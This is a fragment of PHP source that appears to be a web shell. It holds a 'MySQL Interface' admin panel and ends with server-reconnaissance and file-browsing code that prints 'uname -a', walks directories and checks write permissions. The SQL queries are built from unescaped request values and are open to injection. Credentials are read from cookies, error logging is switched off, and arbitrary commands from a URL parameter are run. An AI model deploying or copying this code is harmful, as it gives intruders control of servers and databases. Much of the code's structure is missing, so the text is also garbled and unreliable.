    else if( $cmd == "edit" ) {
        echo "<h1>Edit Data</h1>\n";
        $pResult = mysql_list_fields( $dbname, $tablename );
        $num = mysql_num_fields( $pResult );
        $key = "";
        for( $i = 0; $i < $num; $i++ ) {
            $field = mysql_fetch_field( $pResult, $i );
            if( $field->primary_key == 1 )
                if( $field->numeric == 1 )
                    $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
                    $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
        $key = substr( $key, 0, strlen($key)-4 );

        mysql_select_db( $dbname, $mysqlHandle );
        $pResult = mysql_query( $queryStr =  "SELECT * FROM $tablename WHERE $key", $mysqlHandle );
        $data = mysql_fetch_array( $pResult );

    echo "<p class=location>$dbname > $tablename</p>\n";

    echo "<form action='$PHP_SELF' method=post>\n";
    if( $cmd == "add" )
        echo "<input type=hidden name=action value=addData_submit>\n";
    else if( $cmd == "edit" )
        echo "<input type=hidden name=action value=editData_submit>\n";
    echo "<input type=hidden name=dbname value=$dbname>\n";
    echo "<input type=hidden name=tablename value=$tablename>\n";
    echo "<table cellspacing=1 cellpadding=2>\n";
    echo "<tr>\n";
    echo "<th>Name</th>\n";
    echo "<th>Type</th>\n";
    echo "<th>Function</th>\n";
    echo "<th>Data</th>\n";
    echo "</tr>\n";

    $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
    $num = mysql_num_rows( $pResult );

    $pResultLen = mysql_list_fields( $dbname, $tablename );

    for( $i = 0; $i < $num; $i++ ) {
        $field = mysql_fetch_array( $pResult );
        $fieldname = $field["Field"];
        $fieldtype = $field["Type"];
        $len = mysql_field_len( $pResultLen, $i );

        echo "<tr>";
        echo "<td>$fieldname</td>";
        echo "<td>".$field["Type"]."</td>";
        echo "<td>\n";
        echo "<select name=${fieldname}_function>\n";
        echo "<option>\n";
        echo "<option>ASCII\n";
        echo "<option>CHAR\n";
        echo "<option>SOUNDEX\n";
        echo "<option>CURDATE\n";
        echo "<option>CURTIME\n";
        echo "<option>FROM_DAYS\n";
        echo "<option>FROM_UNIXTIME\n";
        echo "<option>NOW\n";
        echo "<option>PASSWORD\n";
        echo "<option>PERIOD_ADD\n";
        echo "<option>PERIOD_DIFF\n";
        echo "<option>TO_DAYS\n";
        echo "<option>USER\n";
        echo "<option>WEEKDAY\n";
        echo "<option>RAND\n";
        echo "</select>\n";
        echo "</td>\n";
        $value = htmlspecialchars($data[$i]);
        if( $cmd == "add" ) {
            $type = strtok( $fieldtype, " (,)\n" );
            if( $type == "enum" || $type == "set" ) {
                echo "<td>\n";
                if( $type == "enum" )
                    echo "<select name=$fieldname>\n";
                else if( $type == "set" )
                    echo "<select name=$fieldname size=4 multiple>\n";
                while( $str = strtok( "'" ) ) {
                    echo "<option>$str\n";
                    strtok( "'" );
                echo "</select>\n";
                echo "</td>\n";
            } else {
                if( $len < 40 )
                    echo "<td><input type=text size=40 maxlength=$len name=$fieldname></td>\n";
                    echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname></textarea>\n";
        } else if( $cmd == "edit" ) {
            $type = strtok( $fieldtype, " (,)\n" );
            if( $type == "enum" || $type == "set" ) {
                echo "<td>\n";
                if( $type == "enum" )
                    echo "<select name=$fieldname>\n";
                else if( $type == "set" )
                    echo "<select name=$fieldname size=4 multiple>\n";
                while( $str = strtok( "'" ) ) {
                    if( $value == $str )
                        echo "<option selected>$str\n";
                        echo "<option>$str\n";
                    strtok( "'" );
                echo "</select>\n";
                echo "</td>\n";
            } else {
                if( $len < 40 )
                    echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\"></td>\n";
                    echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname>$value</textarea>\n";
        echo "</tr>";
    echo "</table><p>\n";
    if( $cmd == "add" )
        echo "<input type=submit value='Add Data'>\n";
    else if( $cmd == "edit" )
        echo "<input type=submit value='Edit Data'>\n";
    echo "<input type=button value='Cancel' onClick='history.back()'>\n";
    echo "</form>\n";

function manageData_submit( $cmd ) {
    global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;

    $pResult = mysql_list_fields( $dbname, $tablename );
    $num = mysql_num_fields( $pResult );

    mysql_select_db( $dbname, $mysqlHandle );
    if( $cmd == "add" )
        $queryStr = "INSERT INTO $tablename VALUES (";
    else if( $cmd == "edit" )
        $queryStr = "REPLACE INTO $tablename VALUES (";
    for( $i = 0; $i < $num-1; $i++ ) {
        $field = mysql_fetch_field( $pResult );
        $func = $GLOBALS[$field->name."_function"];
        if( $func != "" )
            $queryStr .= " $func(";
        if( $field->numeric == 1 ) {
            $queryStr .= $GLOBALS[$field->name];
            if( $func != "" )
                $queryStr .= "),";
                $queryStr .= ",";
        } else {
            $queryStr .= "'" . $GLOBALS[$field->name];
            if( $func != "" )
                $queryStr .= "'),";
                $queryStr .= "',";
    $field = mysql_fetch_field( $pResult );
    if( $field->numeric == 1 )
        $queryStr .= $GLOBALS[$field->name] . ")";
        $queryStr .= "'" . $GLOBALS[$field->name] . "')";

    mysql_query( $queryStr , $mysqlHandle );
    $errMsg = mysql_error();

    viewData( "" );

function deleteData() {
    global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;

    $pResult = mysql_list_fields( $dbname, $tablename );
    $num = mysql_num_fields( $pResult );

    $key = "";
    for( $i = 0; $i < $num; $i++ ) {
        $field = mysql_fetch_field( $pResult, $i );
        if( $field->primary_key == 1 )
            if( $field->numeric == 1 )
                $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
                $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
    $key = substr( $key, 0, strlen($key)-4 );

    mysql_select_db( $dbname, $mysqlHandle );
    $queryStr =  "DELETE FROM $tablename WHERE $key";
    mysql_query( $queryStr, $mysqlHandle );
    $errMsg = mysql_error();

    viewData( "" );

function fetch_table_dump_sql($table)
    global $mysqlHandle,$dbname;
    mysql_select_db( $dbname, $mysqlHandle );
    $query_id = mysql_query("SHOW CREATE TABLE $table",$mysqlHandle);
    $tabledump = mysql_fetch_array($query_id, MYSQL_ASSOC);
    $tabledump = "DROP TABLE IF EXISTS $table;\n" . $tabledump['Create Table'] . ";\n\n";

    echo $tabledump;

    // get data
    $rows = mysql_query("SELECT * FROM $table",$mysqlHandle);
    while ($row = mysql_fetch_array($rows, MYSQL_NUM))
        $tabledump = "INSERT INTO $table VALUES(";

        $fieldcounter = -1;
        $firstfield = 1;
        // get each field's data
        while (++$fieldcounter < $numfields)
            if (!$firstfield)
                $tabledump .= ', ';
                $firstfield = 0;

            if (!isset($row["$fieldcounter"]))
                $tabledump .= 'NULL';
                $tabledump .= "'" . mysql_escape_string($row["$fieldcounter"]) . "'";

        $tabledump .= ");\n";

        echo $tabledump;


function dump() {
    global $mysqlHandle, $action, $dbname, $tablename;

    if( $action == "dumpTable" ){

        header("Content-disposition: filename=$tablename.sql");
        header('Content-type: unknown/unknown');
        echo "\n\n\n";
        echo "\r\n\r\n\r\n### $tablename TABLE DUMP COMPLETED ###";
        header("Content-disposition: filename=$dbname.sql");
        header('Content-type: unknown/unknown');
        mysql_select_db( $dbname, $mysqlHandle );
        $query_id = mysql_query("SHOW tables",$mysqlHandle);
        while ($row = mysql_fetch_array($query_id, MYSQL_NUM))
                echo "\n\n\n";
                echo "\r\n\r\n\r\n### $row[0] TABLE DUMP COMPLETED ###";
                echo "\n\n\n";
        echo "\r\n\r\n\r\n### $dbname DATABASE DUMP COMPLETED ###";



function utils() {
    global $PHP_SELF, $command;
    echo "<h1>Utilities</h1>\n";
    if( $command == "" || substr( $command, 0, 5 ) == "flush" ) {
        echo "<hr>\n";
        echo "Show\n";
        echo "<ul>\n";
        echo "<li><a href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n";
        echo "<li><a href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n";
        echo "<li><a href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n";
        echo "</ul>\n";
        echo "Flush\n";
        echo "<ul>\n";
        echo "<li><a href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n";
        if( $command == "flush_hosts" ) {
            if( mysql_query( "Flush hosts" ) != false )
                echo "<font size=2 color=red>- Success</font>";
                echo "<font size=2 color=red>- Fail</font>";
        echo "<li><a href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n";
        if( $command == "flush_logs" ) {
            if( mysql_query( "Flush logs" ) != false )
                echo "<font size=2 color=red>- Success</font>";
                echo "<font size=2 color=red>- Fail</font>";
        echo "<li><a href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n";
        if( $command == "flush_privileges" ) {
            if( mysql_query( "Flush privileges" ) != false )
                echo "<font size=2 color=red>- Success</font>";
                echo "<font size=2 color=red>- Fail</font>";
        echo "<li><a href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n";
        if( $command == "flush_tables" ) {
            if( mysql_query( "Flush tables" ) != false )
                echo "<font size=2 color=red>- Success</font>";
                echo "<font size=2 color=red>- Fail</font>";
        echo "<li><a href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n";
        if( $command == "flush_status" ) {
            if( mysql_query( "Flush status" ) != false )
                echo "<font size=2 color=red>- Success</font>";
                echo "<font size=2 color=red>- Fail</font>";
        echo "</ul>\n";
    } else {
        $queryStr = ereg_replace( "_", " ", $command );
        $pResult = mysql_query( $queryStr );
        if( $pResult == false ) {
            echo "Fail";
        $col = mysql_num_fields( $pResult );

        echo "<p class=location>$queryStr</p>\n";
        echo "<hr>\n";

        echo "<table cellspacing=1 cellpadding=2 border=0>\n";
        echo "<tr>\n";
        for( $i = 0; $i < $col; $i++ ) {
            $field = mysql_fetch_field( $pResult, $i );
            echo "<th>".$field->name."</th>\n";
        echo "</tr>\n";

        while( 1 ) {
            $rowArray = mysql_fetch_row( $pResult );
            if( $rowArray == false ) break;
            echo "<tr>\n";
            for( $j = 0; $j < $col; $j++ )
                echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n";
            echo "</tr>\n";
        echo "</table>\n";

function header_html() {
    global $PHP_SELF;
echo '
<title>MySQL Interface</title>
<style type="text/css">
p.location {
    color: #11bb33;
    font-size: small;
h1 {
    color: #A4A260;
th {
    background-color: #BDBE42;
    color: #FFFFFF;
    font-size: x-small;
td {
    background-color: #DEDFA5;
    font-size: x-small;
form {
    margin-top: 0;
    margin-bottom: 0;
a {
    color: #848200;
a:link {
a:hover {

function footer_html() {
    global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME;

    echo "<hr>\n";
    echo "<font size=2 color=blue>[$USERNAME]</font> - \n";

    echo "<a href='$PHP_SELF?action=listDBs'>Database List</a> | \n";
    if( $tablename != "" )
        echo "<a href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table List</a> | ";
    echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n";
    echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n";
    echo "</font>\n";
    echo "</body>\n";
    echo "</html>\n";

//------------- MAIN ------------- //
ini_set ('display_errors', 0);
ini_set ('log_errors', 0);

if( $action == "logon" || $action == "" || $action == "logout" )
else if( $action == "logon_submit" )
else if( $action == "dumpTable" || $action == "dumpDB" ) {
    while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
        if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
        if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
        if( $var == "mysql_web_admin_hostname" ) $HOSTNAME = $value;
    $mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
} else {
    while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
        if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
        if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
        if( $var == "mysql_web_admin_hostname" ) $HOSTNAME = $value;
    echo "<!--";
    $mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
    echo "-->";

    if( $mysqlHandle == false ) {
        echo "<html>\n";
        echo "<head>\n";
        echo "<title>MySQL Interface</title>\n";
        echo "</head>\n";
        echo "<body>\n";
        echo "<table width=100% height=100%><tr><td><center>\n";
        echo "<h1>Wrong Password!</h1>\n";
        echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n";
        echo "</center></td></tr></table>\n";
        echo "</body>\n";
        echo "</html>\n";
    } else {
        if( $action == "listDBs" )
        else if( $action == "createDB" )
        else if( $action == "dropDB" )
        else if( $action == "listTables" )
        else if( $action == "createTable" )
        else if( $action == "dropTable" )
        else if( $action == "viewSchema" )
        else if( $action == "query" )
            viewData( $queryStr );
        else if( $action == "addField" )
            manageField( "add" );
        else if( $action == "addField_submit" )
            manageField_submit( "add" );
        else if( $action == "editField" )
            manageField( "edit" );
        else if( $action == "editField_submit" )
            manageField_submit( "edit" );
        else if( $action == "dropField" )
        else if( $action == "viewData" )
            viewData( "" );
        else if( $action == "addData" )
            manageData( "add" );
        else if( $action == "addData_submit" )
            manageData_submit( "add" );
        else if( $action == "editData" )
            manageData( "edit" );
        else if( $action == "editData_submit" )
            manageData_submit( "edit" );
        else if( $action == "deleteData" )
        else if( $action == "utils" )

        mysql_close( $mysqlHandle);
<p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p>
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
$d = str_replace("\\\\","\\",$d);
$dispd = htmlspecialchars($d);
$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
$i = 0;
foreach($pd as $b)
 $t = "";
 $j = 0;
 foreach ($e as $r)
  if ($j == $i) {break;}
 echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
echo "&nbsp;&nbsp;&nbsp;";
if (is_writable($d))
 $wd = TRUE;
 $wdt = "<font color=green>[ ok ]</font>";
 echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";